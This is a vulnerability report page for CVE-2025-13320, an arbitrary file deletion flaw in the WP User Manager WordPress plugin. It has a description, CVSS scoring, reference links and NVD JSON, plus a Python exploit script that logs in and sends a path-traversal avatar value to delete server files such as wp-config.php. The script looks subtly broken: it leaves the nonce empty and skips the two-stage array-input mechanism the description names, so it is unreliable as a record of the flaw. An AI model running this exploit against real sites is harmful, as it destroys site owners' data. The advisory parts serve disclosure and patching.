Security Vulnerability Report
CVE-2025-13320 CVSS 6.8 MEDIUM

CVE-2025-13320

Published: 2025-12-12 04:15:41
Last Modified: 2026-04-15 00:35:42

Description

The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP User Manager < 2.9.13 (all 2.x versions are affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import sys

# CVE-2025-13320 PoC - WP User Manager Arbitrary File Deletion
# Target: WordPress site with WP User Manager plugin <= 2.9.12
# Authentication required: Subscriber-level or higher
# Prerequisite: Custom avatar setting must be enabled


def delete_arbitrary_file(target_url, username, password, file_to_delete):
    """
    Exploit for CVE-2025-13320: Arbitrary File Deletion in WP User Manager

    Args:
        target_url: Base URL of the WordPress site
        username: Valid user account (subscriber level minimum)
        password: Password for the account
        file_to_delete: Absolute path or relative path of file to delete
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/"
    }
    response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Update profile with malicious avatar path
    # Using path traversal to delete arbitrary files
    profile_url = f"{target_url}/wp-admin/profile.php"

    # Construct malicious payload using current_user_avatar parameter
    # Path traversal: ../../../wp-config.php or similar
    malicious_path = "../../../" + file_to_delete.lstrip("/")

    profile_data = {
        'first_name': 'Test',
        'last_name': 'User',
        'nickname': username,
        'display_name': username,
        'email': '[email protected]',
        'url': '',
        'action': 'update',
        'nonce': '',  # Need to fetch valid nonce
        'current_user_avatar': malicious_path
    }
    response = session.post(profile_url, data=profile_data)
    if response.status_code == 200:
        print(f"[+] File deletion request sent: {file_to_delete}")
        print("[!] Verify file deletion manually")
        return True
    else:
        print("[-] Request failed")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <file_to_delete>")
        print(f"Example: python {sys.argv[0]} http://example.com admin password ../../../wp-config.php")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4]
    delete_arbitrary_file(target, user, pwd, file_path)

References

https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70
https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75
https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86
https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70
https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75
https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86
https://plugins.trac.wordpress.org/changeset/3420956/wp-user-manager/trunk/includes/forms/trait-wpum-account.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13320", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:41.147", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86", "source": "[email protected]"}, {"url": 
"https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3420956/wp-user-manager/trunk/includes/forms/trait-wpum-account.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve", "source": "[email protected]"}]}}